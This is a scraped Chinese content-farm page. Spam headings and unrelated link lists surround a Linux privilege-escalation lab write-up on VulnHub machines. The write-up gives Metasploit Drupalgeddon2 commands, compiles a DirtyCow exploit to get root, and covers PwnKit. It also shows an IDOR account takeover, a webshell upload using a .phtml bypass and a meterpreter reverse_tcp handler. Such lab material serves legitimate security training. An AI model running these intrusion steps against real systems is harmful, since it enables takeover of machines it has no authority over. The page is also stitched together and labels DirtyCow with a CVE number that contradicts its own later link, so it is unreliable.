当前位置: 首页 > news >正文

化肥网站模板北京工商注册查询系统官网

化肥网站模板,北京工商注册查询系统官网,如何做网站域名备案,佛山做网站推广的公司案例一dirtycow#xff08;CVE-2016-5159#xff09; 有个前置知识就是 获取liunx的内核 hostnamectl uname -a 然后这个内核漏洞进行提权的步骤也是和手工win进行提权差不多 也是需要使用辅助工具在本地进行辅助检测 然后去nomi-sec/PoC-in-GitHub#xff1a; #…案例一dirtycowCVE-2016-5159 有个前置知识就是  获取liunx的内核 hostnamectl uname -a 然后这个内核漏洞进行提权的步骤也是和手工win进行提权差不多   也是需要使用辅助工具在本地进行辅助检测  然后去nomi-sec/PoC-in-GitHub 从 GitHub 自动收集 PoC。⚠️ 小心恶意软件。 去找寻exp或者使用   msf本地的  梭哈模块去寻找利用的漏洞 run post/multi/recon/local_exploit_suggester辅助检测工具 单一的内核漏洞检测https://github.com/The-Z-Labs/linux-exploit-suggester 综合型的工具 https://github.com/diego-treitos/linux-smart-enumeration 我们把.sh文件上传到/usr/share 下 然后我们扫描一下我们的靶机 https://www.vulnhub.com/entry/lampiao-1,249/ 靶机下载地址 信息收集扫描ip扫描 访问80端口发现没有信息访问1898 看到这个外星人图标就知道是内网渗透中经常出现的Drupal 这个最常见的利用就是框架漏洞 发现是低版本的php搭建的 所以直接进行利用 这里我直接使用第二个exp 使用use进行调用 查看利用的配置   检查一下payload 设置上  rhost和rport   报这个标头就是进入了 后渗透模式  就是我们已经控制了对方的主机 查看用户权限 找好定位我们现在是在web权限上 输入shell获取对方的命令行 查看id是1000内的所以我们的目标是拿取root权限 需要使用漏洞 先上传检测文件 报了小脏牛漏洞  直接去github上找 nomi-sec/PoC-in-GitHub: PoC auto collect from GitHub. ⚠️ Be careful Malware. 利用的exp exp上传   上传之后把exp.c进行编译 g -Wall -pedantic -O2 -stdc11 -pthread -o dcow dcow.cpp -lutil python -c import pty; pty.spawn(/bin/bash) 复现环境https://www.vulnhub.com/entry/lampiao-1,249/ 1、信息收集 nmap -p1-65535 192.168.139.0/24 2、Web漏洞利用 search drupal use exploit/unix/webapp/drupal_drupalgeddon2 set rhost 192.168.46.144 set rport 1898 run 3、内核提权 upload /root/linux-exploit-suggester.sh /tmp/1.sh shell cd /tmp chmod x 1.sh ./1.sh https://github.com/gbonacini/CVE-2016-5195 upload /root/dcow.cpp /tmp/dcow.cpp g -Wall -pedantic -O2 -stdc11 -pthread -o dcow dcow.cpp -lutil python -c import pty; pty.spawn(/bin/bash) ./dcow su root案例二  pwnkit   靶机下载https://www.vulnhub.com/entry/darkhole-1,724/ sudo arp-scan -l先扫描内网的ip 开放了80  这个漏洞是前端的一个逻辑越权漏洞 先注册一个账号 账号修改里出现这个id可能就是 代表的账户  我们试一下改为1会不会直接修改admin的账号和密码 哥斯拉生成后门 使用绕过形式 改为 .phtml 进行绕过 后门上传成功 后门地点 http://192.168.248.136/upload/xxx.phtml 学个新操做   哥斯拉联动msf在不使用msfvemon生成反弹shell的情况下 命令 71 use /exploits/multi/handler 72 ip a 73 set payload php/meterpreter/reverse_tcp 74 set lport 5566 75 history先加载再go 接受到了shell   然后进行提权 上传检测脚本 这个就是我们要学的新漏洞 第一个方法就是使用本地漏扫工具 run post/multi/recon/local_exploit_suggester 二就是  使用search 搜索cve编号看看exp库中有没有利用的 提权成功
http://www.zqtcl.cn/news/360860/

相关文章:

  • 衡水做wap网站上海做网站吧
  • seo推广思路seo线下培训班
  • 没有备案的网站怎么做淘宝客html5开发手机网站
  • 酒店旅游团购网站建设推广普通话实践总结
  • 基本的网站开发技术路线建设网站的好处有哪些
  • 网站排行怎么做wordpress all in one seo插件
  • 河北特定网站建设推荐wordpress添加vip用户组
  • 北京商城网站建设地址asp.net网站开发 pdf
  • 如何用网页制作网站龙岩门户网站
  • 中国建设银行官网站下载建设网站弹出后加载不进去
  • 广告网站制作多少钱建设工程合同甲方
  • 一号网站建设誉重网站建设
  • 网站seo优化查询网站开发最合适的搭配
  • 做文员的网站知乎qq小程序怎么打开
  • 网站外链建设分析wordpress生成验证码发送代码
  • 网站设计与制作的过程珠海网站建设 旭洁科技
  • 网站建设项目经费的报告轻创网
  • 青岛网站建设制作软件开发培训学校排行
  • pk10网站怎么做网站建设名词
  • 秦皇岛哪有网站优化公司wordpress看图插件
  • ps做网站宽度想做个网站要多少钱
  • 马克斯网站建设外贸电商平台哪个网站最好
  • 国外网站做任务套利网络推广员怎么做
  • 如何创建一个网站用来存放东西wordpress 可以干嘛
  • 做健身俱乐部网站的目的和意义商超网站
  • 网站点击排名phpcms安装
  • 鹧鸪哨网站1v1深度开发最吸引人的营销广告文案
  • 网站建设可以学吗如何修改wordpress的登录
  • 保定做网站的公司百度软件商店
  • 金华市金东区建设局网站wordpress好看的下载页面